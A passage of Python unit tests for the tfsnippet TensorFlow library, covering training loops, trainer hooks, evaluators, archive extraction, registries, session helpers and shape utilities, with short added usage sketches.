RuntimeError, match='Another step loop has been opened'):
with TrainLoop([], max_epoch=10, max_step=10) as loop:
for _ in loop.iter_epochs():
for _ in loop.iter_steps():
for _ in loop.iter_steps():
pass
def require_context():
return pytest.raises(
RuntimeError, match='An epoch or a step loop is expected, '
'but neither has been opened')
with require_context():
with TrainLoop([]) as loop:
with loop.timeit('timer'):
pass
with require_context():
with TrainLoop([]) as loop:
with loop.metric_collector('metric'):
pass
with require_context():
with TrainLoop([]) as loop:
loop.collect_metrics(loss=1.)
with require_context():
with TrainLoop([]) as loop:
loop.println('', with_tag=True)
with require_context():
with TrainLoop([]) as loop:
loop.print_logs()
with pytest.raises(
RuntimeError, match='`data_generator` is required when '
'`max_step` is not configured, so as to '
'prevent an unstoppable step loop'):
with TrainLoop([], max_epoch=10) as loop:
for _ in loop.iter_epochs():
for _ in loop.iter_steps():
pass
with pytest.raises(
TypeError, match='`metrics` should be a dict'):
with TrainLoop([], max_epoch=10) as loop:
for _ in loop.iter_epochs():
loop.collect_metrics(())
```
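A minimal usage sketch distilled from the tests above (not part of the repository): a `TrainLoop` drives epochs and steps over a `DataFlow`, collects a metric, and prints per-epoch logs. The mean-of-batch value used as the loss is a hypothetical stand-in.
```python
import numpy as np
from tfsnippet.dataflows import DataFlow
from tfsnippet.scaffold import TrainLoop

train_flow = DataFlow.arrays([np.arange(20, dtype=np.float32)], batch_size=4)

with TrainLoop([], max_epoch=2) as loop:       # no parameter variables tracked
    for epoch in loop.iter_epochs():
        for step, [x] in loop.iter_steps(train_flow):
            loss = float(np.mean(x))           # hypothetical "loss" value
            loop.collect_metrics(loss=loss)
        loop.print_logs()                      # per-epoch summary, as in the tests
```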
#### File: tests/trainer/test_base_trainer.py
```python
import functools
import numpy as np
import pytest
import tensorflow as tf
from mock import Mock
from tfsnippet.dataflows import DataFlow
from tfsnippet.scaffold import TrainLoop, AnnealingVariable, EventKeys
from tfsnippet.trainer import *
from tfsnippet.utils import EventSource
class BaseTrainerTestCase(tf.test.TestCase):
def test_props(self):
loop = Mock(valid_metric_name='valid_loss')
t = BaseTrainer(loop)
self.assertIs(loop, t.loop)
self.assertIsInstance(t.events, EventSource)
def test_add_and_remove_hooks(self):
loop = Mock(
valid_metric_name='valid_loss',
print_logs=Mock(return_value=None, __repr__=lambda o: 'print_logs')
)
df = Mock()
eval1 = Evaluator(loop, 1., [], df)
eval2 = Evaluator(loop, 2., [], df)
anneal1 = AnnealingVariable('anneal1', 1., .5)
anneal2 = AnnealingVariable('anneal2', 2., .5)
# test add
t = BaseTrainer(loop)
t.log_after_steps(3)
t.log_after_epochs(4)
t.evaluate_after_steps(
Mock(return_value=None, __repr__=lambda o: 'eval'), 5)
t.evaluate_after_epochs(
Mock(return_value=None, __repr__=lambda o: 'eval'), 6)
t.anneal_after_steps(
Mock(return_value=None, __repr__=lambda o: 'anneal'), 7)
t.anneal_after_epochs(
Mock(return_value=None, __repr__=lambda o: 'anneal'), 8)
t.evaluate_after_steps(eval1, 9)
t.evaluate_after_epochs(eval2, 10)
t.anneal_after_steps(anneal1, 11)
t.anneal_after_epochs(anneal2, 12)
t.log_after(steps=13)
t.log_after(epochs=14)
t.evaluate_after(
Mock(return_value=None, __repr__=lambda o: 'eval2'),
steps=15
)
t.evaluate_after(
Mock(return_value=None, __repr__=lambda o: 'eval2'),
epochs=16
)
t.anneal_after(
Mock(return_value=None, __repr__=lambda o: 'anneal2'),
steps=17
)
t.anneal_after(
Mock(return_value=None, __repr__=lambda o: 'anneal2'),
epochs=18
)
self.assertEqual(
repr(t.events._event_handlers_map[EventKeys.STEP_EVALUATION]),
'[eval:step:5, {!r}:step:9, eval2:step:15]'.format(eval1.run)
)
self.assertEqual(
repr(t.events._event_handlers_map[EventKeys.STEP_ANNEALING]),
'[anneal:step:7, {!r}:step:11, anneal2:step:17]'.
format(anneal1.anneal)
)
self.assertEqual(
repr(t.events._event_handlers_map[EventKeys.STEP_LOGGING]),
'[print_logs:step:3, print_logs:step:13]'
)
self.assertEqual(
repr(t.events._event_handlers_map[EventKeys.EPOCH_EVALUATION]),
'[eval:epoch:6, {!r}:epoch:10, eval2:epoch:16]'.format(eval2.run)
)
self.assertEqual(
repr(t.events._event_handlers_map[EventKeys.EPOCH_ANNEALING]),
'[anneal:epoch:8, {!r}:epoch:12, anneal2:epoch:18]'.
format(anneal2.anneal)
)
self.assertEqual(
repr(t.events._event_handlers_map[EventKeys.EPOCH_LOGGING]),
'[print_logs:epoch:4, print_logs:epoch:14]'
)
# test remove
t.remove_log_hooks()
self.assertNotIn(
EventKeys.STEP_LOGGING, t.events._event_handlers_map)
self.assertNotIn(
EventKeys.EPOCH_LOGGING, t.events._event_handlers_map)
t.remove_validation_hooks()
self.assertNotIn(
EventKeys.STEP_EVALUATION, t.events._event_handlers_map)
self.assertNotIn(
EventKeys.EPOCH_EVALUATION, t.events._event_handlers_map)
t.remove_annealing_hooks()
self.assertNotIn(
EventKeys.STEP_ANNEALING, t.events._event_handlers_map)
self.assertNotIn(
EventKeys.EPOCH_ANNEALING, t.events._event_handlers_map)
        # test registering hooks with invalid arguments
func_list = [
t.log_after,
functools.partial(t.evaluate_after, Mock()),
functools.partial(t.anneal_after, Mock()),
]
kwargs_list = [
{'steps': None, 'epochs': None},
{'steps': 1, 'epochs': 1}
]
for func in func_list:
for kwargs in kwargs_list:
with pytest.raises(
ValueError, match='One and only one of `epochs` and '
'`steps` should be specified'):
func(**kwargs)
def test_hook_freq(self):
loop = Mock(
valid_metric_name='valid_loss',
print_logs=Mock(return_value=None, __repr__=lambda o: 'print_logs')
)
t = BaseTrainer(loop)
f = Mock()
t.evaluate_after(f, steps=5)
for i in range(1, 6):
t.loop.step = i
t.events.fire(EventKeys.STEP_EVALUATION, t)
t.loop.step = 7
t.events.fire(EventKeys.STEP_EVALUATION, t)
t.loop.step = 10
t.events.fire(EventKeys.STEP_EVALUATION, t)
self.assertEqual(f.call_count, 2)
def test_run(self):
with self.test_session() as session:
df = DataFlow.arrays([np.arange(6, dtype=np.float32)], batch_size=4)
def log_event(m, trainer):
logged_events.append((m, trainer))
logged_events = []
            # test run(): step payloads and hook event firing order
with TrainLoop([], max_epoch=2) as loop:
t = BaseTrainer(loop)
t._run_step = Mock(return_value=None)
t._iter_steps = Mock(wraps=lambda: loop.iter_steps(df))
for key in [EventKeys.BEFORE_EPOCH,
EventKeys.BEFORE_STEP,
EventKeys.STEP_ANNEALING,
EventKeys.STEP_EVALUATION,
EventKeys.STEP_LOGGING,
EventKeys.AFTER_STEP,
EventKeys.EPOCH_ANNEALING,
EventKeys.EPOCH_EVALUATION,
EventKeys.EPOCH_LOGGING,
EventKeys.AFTER_EPOCH]:
t.events.on(key, functools.partial(log_event, key))
t.run()
self.assertEqual(4, len(t._run_step.call_args_list))
for i, call_args in enumerate(t._run_step.call_args_list[:-2]):
call_session, call_payload = call_args[0]
self.assertIs(session, call_session)
self.assertEqual(i + 1, call_payload[0])
self.assertIsInstance(call_payload[1], tuple)
self.assertEqual(1, len(call_payload[1]))
np.testing.assert_equal(
np.arange(6, dtype=np.float32)[i * 4: (i + 1) * 4],
call_payload[1][0]
)
expected_logged_events = sum(
[
[
(EventKeys.BEFORE_EPOCH, t),
] + sum([
[
(EventKeys.BEFORE_STEP, t),
(EventKeys.STEP_EVALUATION, t),
(EventKeys.STEP_ANNEALING, t),
(EventKeys.STEP_LOGGING, t),
(EventKeys.AFTER_STEP, t),
]
for step in [0, 1]
], []) + [
(EventKeys.EPOCH_EVALUATION, t),
(EventKeys.EPOCH_ANNEALING, t),
(EventKeys.EPOCH_LOGGING, t),
(EventKeys.AFTER_EPOCH, t)
]
for epoch in [0, 1]
],
[]
)
self.assertListEqual(logged_events, expected_logged_events)
# test re-entrant error
with TrainLoop([], max_epoch=1) as loop:
t = BaseTrainer(loop)
t._run_step = Mock(return_value=None)
t._iter_steps = Mock(wraps=lambda: loop.iter_steps(df))
def reentrant_error(trainer):
self.assertIs(trainer, t)
with pytest.raises(
RuntimeError, match=r'`run\(\)` is not re-entrant'):
t.run()
reentrant_error = Mock(wraps=reentrant_error)
t.events.on(EventKeys.AFTER_STEP, reentrant_error)
t.run()
self.assertTrue(reentrant_error.called)
```
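A sketch of the hook registration API exercised above (not from the repository). The tests mock `_iter_steps()` and `_run_step()`, which a concrete trainer subclass is expected to provide, so this sketch only wires up logging, evaluation and annealing hooks; `my_eval` and `my_anneal` are hypothetical placeholders.
```python
from mock import Mock
from tfsnippet.scaffold import TrainLoop
from tfsnippet.trainer import BaseTrainer

with TrainLoop([], max_epoch=10) as loop:
    trainer = BaseTrainer(loop)
    trainer.log_after(steps=100)    # print the loop's logs every 100 steps
    trainer.log_after(epochs=1)     # and again after every epoch
    # `my_eval` / `my_anneal` stand in for an `Evaluator.run` or an
    # `AnnealingVariable.anneal`; Mocks are used here just as in the tests
    my_eval = Mock(return_value=None)
    my_anneal = Mock(return_value=None)
    trainer.evaluate_after(my_eval, epochs=1)
    trainer.anneal_after(my_anneal, steps=1000)
    # trainer.run() would now drive the loop, provided `_iter_steps()` and
    # `_run_step()` are implemented (the tests above mock them)
```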
#### File: tests/trainer/test_evaluator.py
```python
import unittest
import numpy as np
import pytest
import tensorflow as tf
from mock import Mock
from tfsnippet.dataflows import DataFlow
from tfsnippet.scaffold import TrainLoop
from tfsnippet.trainer import *
from tfsnippet.utils import EventSource
class AutoBatchWeightTestCase(unittest.TestCase):
def test_auto_loss_weight(self):
self.assertEqual(5., auto_batch_weight(np.arange(5)))
self.assertEqual(7., auto_batch_weight(np.arange(7), np.arange(5)))
self.assertEqual(1., auto_batch_weight(None))
class EvaluatorTestCase(tf.test.TestCase):
def test_props(self):
loop = Mock(valid_metric_name='valid_loss')
df = Mock()
v = Evaluator(loop, 12, [34, 56], df)
self.assertIs(loop, v.loop)
with self.test_session():
self.assertEqual(12, v.metrics['valid_loss'].eval())
self.assertEqual([34, 56], v.inputs)
self.assertIs(v.data_flow, df)
self.assertEqual({}, v.feed_dict)
self.assertEqual('eval_time', v.time_metric_name)
self.assertIs(auto_batch_weight, v.batch_weight_func)
self.assertIsInstance(v.events, EventSource)
batch_weight_func = Mock(return_value=123.)
v = Evaluator(loop, {'valid_loss_x': 12}, [34, 56], df,
feed_dict={'a': 1},
time_metric_name='valid_time_x',
batch_weight_func=batch_weight_func)
with self.test_session():
self.assertEqual(12, v.metrics['valid_loss_x'].eval())
self.assertEqual('valid_time_x', v.time_metric_name)
self.assertIs(batch_weight_func, v.batch_weight_func)
def test_error(self):
with pytest.raises(ValueError, match='Metric is not a scalar tensor'):
_ = Evaluator(Mock(), {'x': tf.constant([1, 2])}, [], Mock())
def test_run(self):
with self.test_session() as session:
df = DataFlow.arrays([np.arange(6, dtype=np.float32)], batch_size=4)
ph = tf.placeholder(tf.float32, shape=[None])
ph2 = tf.placeholder(tf.float32, shape=[])
ph3 = tf.placeholder(tf.float32, shape=[])
# test default loss weight and merged feed dict
with TrainLoop([], max_epoch=1) as loop:
v = Evaluator(loop, tf.reduce_mean(ph), [ph], df,
feed_dict={ph2: 34})
v._run_batch = Mock(wraps=v._run_batch)
for epoch in loop.iter_epochs():
v.run({ph3: 56})
np.testing.assert_almost_equal(
2.5, loop._epoch_metrics._metrics['valid_loss'].mean)
np.testing.assert_almost_equal(
2.5, v.last_metrics_dict['valid_loss'])
self.assertIn('eval_time', loop._epoch_metrics._metrics)
self.assertEqual(2, len(v._run_batch.call_args_list))
for i, call_args in enumerate(v._run_batch.call_args_list):
call_session, call_feed_dict = call_args[0]
self.assertIs(session, call_session)
np.testing.assert_equal(
np.arange(6, dtype=np.float32)[i*4: (i+1)*4],
call_feed_dict[ph]
)
self.assertEqual(34, call_feed_dict[ph2])
self.assertEqual(56, call_feed_dict[ph3])
# test None loss weight and None time metric and override feed dict
with TrainLoop([], max_epoch=1) as loop:
v = Evaluator(loop, {'valid_loss_x': tf.reduce_mean(ph)},
[ph], df,
feed_dict={ph2: 34},
batch_weight_func=None,
time_metric_name=None)
v._run_batch = Mock(wraps=v._run_batch)
for epoch in loop.iter_epochs():
v.run({ph2: 56})
np.testing.assert_almost_equal(
3.0, loop._epoch_metrics._metrics['valid_loss_x'].mean)
np.testing.assert_almost_equal(
3.0, v.last_metrics_dict['valid_loss_x'])
self.assertNotIn('eval_time', loop._epoch_metrics._metrics)
for i, call_args in enumerate(v._run_batch.call_args_list):
call_session, call_feed_dict = call_args[0]
self.assertEqual(56, call_feed_dict[ph2])
self.assertNotIn(ph3, call_feed_dict)
```
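A usage sketch pieced together from `test_run` above (not part of the repository): an `Evaluator` computes a validation metric over a `DataFlow` once per epoch and reports it through `last_metrics_dict`.
```python
import numpy as np
import tensorflow as tf
from tfsnippet.dataflows import DataFlow
from tfsnippet.scaffold import TrainLoop
from tfsnippet.trainer import Evaluator

valid_flow = DataFlow.arrays([np.arange(6, dtype=np.float32)], batch_size=4)
ph = tf.placeholder(tf.float32, shape=[None])

with tf.Session().as_default(), TrainLoop([], max_epoch=1) as loop:
    evaluator = Evaluator(loop, tf.reduce_mean(ph), [ph], valid_flow)
    for epoch in loop.iter_epochs():
        evaluator.run()
        print(evaluator.last_metrics_dict)   # e.g. {'valid_loss': 2.5}
```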
#### File: tests/utils/_div_op.py
```python
def regular_div(x, y):
return x / y
def floor_div(x, y):
return x // y
```
#### File: tests/utils/test_debugging.py
```python
import pytest
import numpy as np
import tensorflow as tf
from tfsnippet.utils import *
class AssertionTestCase(tf.test.TestCase):
def test_assert_deps(self):
ph = tf.placeholder(dtype=tf.bool, shape=())
op = tf.assert_equal(ph, True, message='abcdefg')
# test ops are empty
with assert_deps([None]) as asserted:
self.assertFalse(asserted)
# test assertion enabled, and ops are not empty
with self.test_session() as sess, \
scoped_set_config(settings, enable_assertions=True):
with assert_deps([op, None]) as asserted:
self.assertTrue(asserted)
out = tf.constant(1.)
with pytest.raises(Exception, match='abcdefg'):
self.assertEqual(sess.run(out, feed_dict={ph: False}), 1.)
# test assertion disabled
with self.test_session() as sess, \
scoped_set_config(settings, enable_assertions=False):
with assert_deps([op, None]) as asserted:
self.assertFalse(asserted)
out = tf.constant(1.)
self.assertEqual(sess.run(out, feed_dict={ph: False}), 1.)
class CheckNumericsTestCase(tf.test.TestCase):
def test_check_numerics(self):
# test enabled
ph = tf.placeholder(dtype=tf.float32, shape=())
with scoped_set_config(settings, check_numerics=True):
x = maybe_check_numerics(ph, message='numerical issues')
with pytest.raises(Exception, match='numerical issues'):
with self.test_session() as sess:
_ = sess.run(x, feed_dict={ph: np.nan})
# test disabled
with scoped_set_config(settings, check_numerics=False):
x = maybe_check_numerics(
tf.constant(np.nan), message='numerical issues')
with self.test_session() as sess:
self.assertTrue(np.isnan(sess.run(x)))
class AddHistogramTestCase(tf.test.TestCase):
def test_add_histogram(self):
with tf.name_scope('parent'):
x = tf.constant(0., name='x')
y = tf.constant(1., name='y')
z = tf.constant(2., name='z')
w = tf.constant(3., name='w')
# test enabled
with scoped_set_config(settings, auto_histogram=True):
maybe_add_histogram(x, strip_scope=True)
maybe_add_histogram(y, summary_name='the_tensor')
maybe_add_histogram(z, collections=[tf.GraphKeys.SUMMARIES])
# test disabled
with scoped_set_config(settings, auto_histogram=False):
maybe_add_histogram(w)
self.assertListEqual(
[op.name for op in tf.get_collection(GraphKeys.AUTO_HISTOGRAM)],
['maybe_add_histogram/x:0', 'maybe_add_histogram_1/the_tensor:0']
)
self.assertListEqual(
[op.name for op in tf.get_collection(tf.GraphKeys.SUMMARIES)],
['maybe_add_histogram_2/parent/z:0']
)
```
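A short sketch (not from the repository) of the config-scoping pattern these tests rely on: `maybe_check_numerics` only wraps the tensor in a numerics check while `settings.check_numerics` is enabled. The explicit import list mirrors the names used via the wildcard import above.
```python
import numpy as np
import tensorflow as tf
from tfsnippet.utils import settings, scoped_set_config, maybe_check_numerics

ph = tf.placeholder(tf.float32, shape=())

with scoped_set_config(settings, check_numerics=True):
    checked = maybe_check_numerics(ph, message='numerical issues')    # wrapped
with scoped_set_config(settings, check_numerics=False):
    unchecked = maybe_check_numerics(ph, message='numerical issues')  # passthrough

with tf.Session() as sess:
    print(sess.run(unchecked, feed_dict={ph: np.nan}))   # nan, no error raised
    # sess.run(checked, feed_dict={ph: np.nan}) would raise an error
    # whose message contains 'numerical issues'
```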
#### File: tests/utils/test_extractor.py
```python
import os
import shutil
import sys
import unittest
import pytest
from tfsnippet.utils import *
class ExtractorTestCase(unittest.TestCase):
def check_archive_file(self, extractor_class, archive_file, alias=None):
if alias is not None:
with TemporaryDirectory() as tmpdir:
new_archive_file = os.path.join(tmpdir, alias)
shutil.copy(archive_file, new_archive_file)
self.check_archive_file(extractor_class, new_archive_file)
else:
with Extractor.open(archive_file) as e:
self.assertIsInstance(e, extractor_class)
files = [(n, f.read()) for n, f in e.iter_extract()]
self.assertListEqual(
[
('a/1.txt', b'a/1.txt'),
('b/2.txt', b'b/2.txt'),
('c.txt', b'c.txt'),
],
files
)
def get_asset(self, name):
return os.path.join(
os.path.split(os.path.abspath(__file__))[0],
'assets',
name
)
def test_zip(self):
self.check_archive_file(ZipExtractor, self.get_asset('payload.zip'))
def test_rar(self):
self.check_archive_file(RarExtractor, self.get_asset('payload.rar'))
def test_tar(self):
self.check_archive_file(TarExtractor, self.get_asset('payload.tar'))
# xz
if sys.version_info[:2] >= (3, 3):
self.check_archive_file(
TarExtractor, self.get_asset('payload.tar.xz'))
self.check_archive_file(
TarExtractor, self.get_asset('payload.tar.xz'), 'payload.txz')
# gz
self.check_archive_file(TarExtractor, self.get_asset('payload.tar.gz'))
self.check_archive_file(TarExtractor, self.get_asset('payload.tar.gz'),
'payload.tgz')
# bz2
self.check_archive_file(TarExtractor, self.get_asset('payload.tar.bz2'))
self.check_archive_file(TarExtractor, self.get_asset('payload.tar.bz2'),
'payload.tbz')
self.check_archive_file(TarExtractor, self.get_asset('payload.tar.bz2'),
'payload.tbz2')
self.check_archive_file(TarExtractor, self.get_asset('payload.tar.bz2'),
'payload.tb2')
def test_errors(self):
with TemporaryDirectory() as tmpdir:
archive_file = os.path.join(tmpdir, 'payload.txt')
with open(archive_file, 'wb') as f:
f.write(b'')
with pytest.raises(
IOError, match='File is not a supported archive file'):
with Extractor.open(archive_file):
pass
```
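A small sketch (not from the repository) of the `Extractor.open` pattern checked above; `archive.zip` is a hypothetical path.
```python
from tfsnippet.utils import Extractor

# Extractor.open picks the concrete extractor (zip / rar / tar*) from the file
with Extractor.open('archive.zip') as extractor:      # hypothetical path
    for name, file_obj in extractor.iter_extract():
        data = file_obj.read()                        # bytes of the member
        print(name, len(data))
```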
#### File: tests/utils/test_registry.py
```python
import unittest
import pytest
from tfsnippet.utils import BaseRegistry, ClassRegistry
class RegistryTestCase(unittest.TestCase):
def test_base_registry(self):
a = object()
b = object()
        # test a case-sensitive registry (ignore_case=False)
r = BaseRegistry(ignore_case=False)
self.assertFalse(r.ignore_case)
r.register('a', a)
self.assertIs(r.get('a'), a)
with pytest.raises(KeyError, match='Object not registered: \'A\''):
_ = r.get('A')
self.assertListEqual(list(r), ['a'])
with pytest.raises(KeyError, match='Object already registered: \'a\''):
_ = r.register('a', a)
with pytest.raises(KeyError, match='Object not registered: \'b\''):
_ = r.get('b')
r.register('A', b)
self.assertIs(r.get('A'), b)
self.assertListEqual(list(r), ['a', 'A'])
        # test a case-insensitive registry (ignore_case=True)
r = BaseRegistry(ignore_case=True)
self.assertTrue(r.ignore_case)
r.register('a', a)
self.assertIs(r.get('a'), a)
self.assertIs(r.get('A'), a)
self.assertListEqual(list(r), ['a'])
with pytest.raises(KeyError, match='Object already registered: \'A\''):
_ = r.register('A', a)
with pytest.raises(KeyError, match='Object not registered: \'b\''):
_ = r.get('b')
r.register('B', b)
self.assertIs(r.get('b'), b)
self.assertIs(r.get('B'), b)
self.assertListEqual(list(r), ['a', 'B'])
def test_class_registry(self):
r = ClassRegistry()
with pytest.raises(TypeError, match='`obj` is not a class: 123'):
r.register('int', 123)
class MyClass(object):
def __init__(self, value, message):
self.value = value
self.message = message
r.register('MyClass', MyClass)
self.assertIs(r.get('MyClass'), MyClass)
o = r.construct('MyClass', 123, message='message')
self.assertIsInstance(o, MyClass)
self.assertEqual(o.value, 123)
self.assertEqual(o.message, 'message')
```
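A sketch (not from the repository) of the two registries exercised above: a case-insensitive `BaseRegistry` for arbitrary objects, and a `ClassRegistry` that can also construct instances.
```python
from tfsnippet.utils import BaseRegistry, ClassRegistry

# case-insensitive object registry
objects = BaseRegistry(ignore_case=True)
objects.register('Foo', {'answer': 42})
assert objects.get('foo') is objects.get('FOO')

# class registry: get() returns the class, construct() instantiates it
classes = ClassRegistry()

class Greeter(object):
    def __init__(self, value, message):
        self.value = value
        self.message = message

classes.register('Greeter', Greeter)
obj = classes.construct('Greeter', 123, message='hello')
assert (obj.value, obj.message) == (123, 'hello')
```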
#### File: tests/utils/test_session.py
```python
import pytest
import tensorflow as tf
from tfsnippet.shortcuts import global_reuse
from tfsnippet.utils import (get_default_session_or_error,
get_variables_as_dict,
get_uninitialized_variables,
ensure_variables_initialized,
create_session,
get_variable_ddi)
class CreateSessionTestCase(tf.test.TestCase):
def test_create_session(self):
with pytest.raises(TypeError, match='`lock_memory` must be True, '
'False or float'):
_ = create_session(lock_memory='')
# test with default options
session = create_session()
self.assertFalse(session._config.gpu_options.allow_growth)
self.assertFalse(session._config.log_device_placement)
self.assertTrue(session._config.allow_soft_placement)
# test with various options
session = create_session(lock_memory=0.5, log_device_placement=True,
allow_soft_placement=False)
self.assertEqual(
session._config.gpu_options.per_process_gpu_memory_fraction, .5)
self.assertTrue(session._config.log_device_placement)
self.assertFalse(session._config.allow_soft_placement)
# test with lock_memory = False
session = create_session(lock_memory=False)
self.assertTrue(session._config.gpu_options.allow_growth)
class GetDefaultSessionOrErrorTestCase(tf.test.TestCase):
def test_get_default_session_or_error(self):
with pytest.raises(RuntimeError, match='No session is active'):
get_default_session_or_error()
with self.test_session(use_gpu=False) as sess:
self.assertIs(sess, get_default_session_or_error())
with pytest.raises(RuntimeError, match='No session is active'):
get_default_session_or_error()
class GetVariablesTestCase(tf.test.TestCase):
def test_get_variables_as_dict(self):
GLOBAL_VARIABLES = tf.GraphKeys.GLOBAL_VARIABLES
MODEL_VARIABLES = tf.GraphKeys.MODEL_VARIABLES
LOCAL_VARIABLES = tf.GraphKeys.LOCAL_VARIABLES
# create the variables to be checked
a = tf.get_variable(
'a', shape=(), collections=[GLOBAL_VARIABLES, MODEL_VARIABLES])
b = tf.get_variable(
'b', shape=(), collections=[GLOBAL_VARIABLES])
c = tf.get_variable(
'c', shape=(), collections=[MODEL_VARIABLES])
with tf.variable_scope('child') as child:
child_a = tf.get_variable(
'a', shape=(),
collections=[GLOBAL_VARIABLES, MODEL_VARIABLES])
child_b = tf.get_variable(
'b', shape=(), collections=[GLOBAL_VARIABLES])
child_c = tf.get_variable(
'c', shape=(), collections=[MODEL_VARIABLES])
# test to get variables as dict
self.assertEqual(
get_variables_as_dict(),
{'a': a, 'b': b, 'child/a': child_a, 'child/b': child_b}
)
self.assertEqual(
get_variables_as_dict(collection=MODEL_VARIABLES),
{'a': a, 'c': c, 'child/a': child_a, 'child/c': child_c}
)
self.assertEqual(
get_variables_as_dict(collection=LOCAL_VARIABLES),
{}
)
self.assertEqual(
get_variables_as_dict(''),
{'a': a, 'b': b, 'child/a': child_a, 'child/b': child_b}
)
self.assertEqual(
get_variables_as_dict('child'),
{'a': child_a, 'b': child_b}
)
self.assertEqual(
get_variables_as_dict('child/'),
{'a': child_a, 'b': child_b}
)
self.assertEqual(
get_variables_as_dict(child),
{'a': child_a, 'b': child_b}
)
self.assertEqual(
get_variables_as_dict('child', collection=MODEL_VARIABLES),
{'a': child_a, 'c': child_c}
)
self.assertEqual(
get_variables_as_dict('child', collection=LOCAL_VARIABLES),
{}
)
self.assertEqual(
get_variables_as_dict('non_exist'),
{}
)
class GetUninitializedVariablesTestCase(tf.test.TestCase):
def test_get_uninitialized_variables(self):
with self.test_session() as sess:
a = tf.get_variable('a', dtype=tf.int32, initializer=1)
b = tf.get_variable('b', dtype=tf.int32, initializer=2)
c = tf.get_variable('c', dtype=tf.int32, initializer=3,
collections=[tf.GraphKeys.MODEL_VARIABLES])
d = tf.get_variable('d', dtype=tf.int32, initializer=4,
collections=[tf.GraphKeys.MODEL_VARIABLES])
self.assertEqual(
get_uninitialized_variables(),
[a, b]
)
self.assertEqual(
get_uninitialized_variables([a, b, c, d]),
[a, b, c, d]
)
sess.run(tf.variables_initializer([a, c]))
self.assertEqual(
get_uninitialized_variables(),
[b]
)
self.assertEqual(
get_uninitialized_variables([a, b, c, d]),
[b, d]
)
sess.run(tf.variables_initializer([b, d]))
self.assertEqual(
get_uninitialized_variables(),
[]
)
self.assertEqual(
get_uninitialized_variables([a, b, c, d]),
[]
)
class EnsureVariablesInitializedTestCase(tf.test.TestCase):
def test_ensure_variables_initialized(self):
a = tf.get_variable('a', dtype=tf.int32, initializer=1)
b = tf.get_variable('b', dtype=tf.int32, initializer=2)
c = tf.get_variable('c', dtype=tf.int32, initializer=3,
collections=[tf.GraphKeys.MODEL_VARIABLES])
d = tf.get_variable('d', dtype=tf.int32, initializer=4,
collections=[tf.GraphKeys.MODEL_VARIABLES])
# test using list
with self.test_session():
self.assertEqual(
get_uninitialized_variables([a, b, c, d]),
[a, b, c, d]
)
ensure_variables_initialized()
self.assertEqual(
get_uninitialized_variables([a, b, c, d]),
[c, d]
)
ensure_variables_initialized([a, b, c, d])
self.assertEqual(
get_uninitialized_variables([a, b, c, d]),
[]
)
def test_ensure_variables_initialized_using_dict(self):
a = tf.get_variable('a', dtype=tf.int32, initializer=1)
b = tf.get_variable('b', dtype=tf.int32, initializer=2)
# test using dict
with self.test_session():
ensure_variables_initialized({'a': a})
self.assertEqual(
get_uninitialized_variables([a, b]),
[b]
)
class GetVariableDDITestCase(tf.test.TestCase):
def test_get_variable_ddi(self):
# test collections
def g(name, initial_value, initializing=False, collections=None):
v = get_variable_ddi(
name, initial_value, shape=(), initializing=initializing,
collections=collections
)
# ensure `get_variable_ddi` will add the variable to collections
for coll in (collections or [tf.GraphKeys.GLOBAL_VARIABLES]):
self.assertEqual(
tf.get_collection(coll)[-1].name.rsplit('/', 1)[-1],
name + ':0'
)
return v
_ = g('var', 0., initializing=True,
collections=[tf.GraphKeys.MODEL_VARIABLES])
# test reuse
@global_reuse
def f(initial_value, initializing=False):
return g('x', initial_value, initializing=initializing)
with self.test_session() as sess:
x_in = tf.placeholder(dtype=tf.float32, shape=())
x = f(x_in, initializing=True)
self.assertEqual(sess.run(x, feed_dict={x_in: 123.}), 123.)
x = f(x_in, initializing=False)
self.assertEqual(sess.run(x, feed_dict={x_in: 456.}), 123.)
```
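A sketch (not from the repository) combining the session helpers tested above: create a session, initialize only the variables that still need it, and collect variables by scope.
```python
import tensorflow as tf
from tfsnippet.utils import (create_session, ensure_variables_initialized,
                             get_uninitialized_variables, get_variables_as_dict)

a = tf.get_variable('a', dtype=tf.int32, initializer=1)
with tf.variable_scope('child'):
    b = tf.get_variable('b', dtype=tf.int32, initializer=2)

session = create_session()          # allow_soft_placement=True by default
with session.as_default():
    print(get_uninitialized_variables())    # [a, b]
    ensure_variables_initialized()          # initializes whatever is left
    print(get_uninitialized_variables())    # []
    print(get_variables_as_dict('child'))   # {'b': <the child/b variable>}
```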
#### File: tests/utils/test_shape_utils.py
```python
import pytest
import numpy as np
import tensorflow as tf
from tfsnippet.utils import *
class IntShapeTestCase(tf.test.TestCase):
def test_int_shape(self):
self.assertEqual(get_static_shape(tf.zeros([1, 2, 3])), (1, 2, 3))
self.assertEqual(
get_static_shape(tf.placeholder(tf.float32, [None, 2, 3])),
(None, 2, 3)
)
self.assertIsNone(get_static_shape(tf.placeholder(tf.float32, None)))
class ResolveNegativeAxisTestCase(tf.test.TestCase):
def test_resolve_negative_axis(self):
# good case
self.assertEqual(resolve_negative_axis(4, (0, 1, 2)), (0, 1, 2))
self.assertEqual(resolve_negative_axis(4, (0, -1, -2)), (0, 3, 2))
# bad case
with pytest.raises(ValueError, match='`axis` out of range: \\(-5,\\) '
'vs ndims 4.'):
_ = resolve_negative_axis(4, (-5,))
with pytest.raises(ValueError, match='`axis` has duplicated elements '
'after resolving negative axis.'):
_ = resolve_negative_axis(4, (0, -4))
class GetBatchSizeTestCase(tf.test.TestCase):
def test_get_batch_size(self):
def run_check(sess, x, axis, x_in=None, dynamic=True):
if x_in is None:
x_in = tf.constant(x)
dynamic = False
batch_size = get_batch_size(x_in, axis)
if dynamic:
self.assertIsInstance(batch_size, tf.Tensor)
self.assertEqual(sess.run(batch_size, feed_dict={x_in: x}),
x.shape[axis])
else:
self.assertEqual(batch_size, x.shape[axis])
with self.test_session() as sess:
x = np.zeros([2, 3, 4], dtype=np.float32)
# check when shape is totally static
run_check(sess, x, 0)
run_check(sess, x, 1)
run_check(sess, x, 2)
run_check(sess, x, -1)
# check when some shape is dynamic, but the batch axis is not
run_check(sess, x, 0, tf.placeholder(tf.float32, [2, None, None]),
dynamic=False)
run_check(sess, x, 1, tf.placeholder(tf.float32, [None, 3, None]),
dynamic=False)
run_check(sess, x, 2, tf.placeholder(tf.float32, [None, None, 4]),
dynamic=False)
run_check(sess, x, -1, tf.placeholder(tf.float32, [None, None, 4]),
dynamic=False)
# check when the batch axis is dynamic
run_check(sess, x, 0, tf.placeholder(tf.float32, [None, 3, 4]),
dynamic=True)
run_check(sess, x, 1, tf.placeholder(tf.float32, [2, None, 4]),
dynamic=True)
run_check(sess, x, 2, tf.placeholder(tf.float32, [2, 3, None]),
dynamic=True)
run_check(sess, x, -1, tf.placeholder(tf.float32, [2, 3, None]),
dynamic=True)
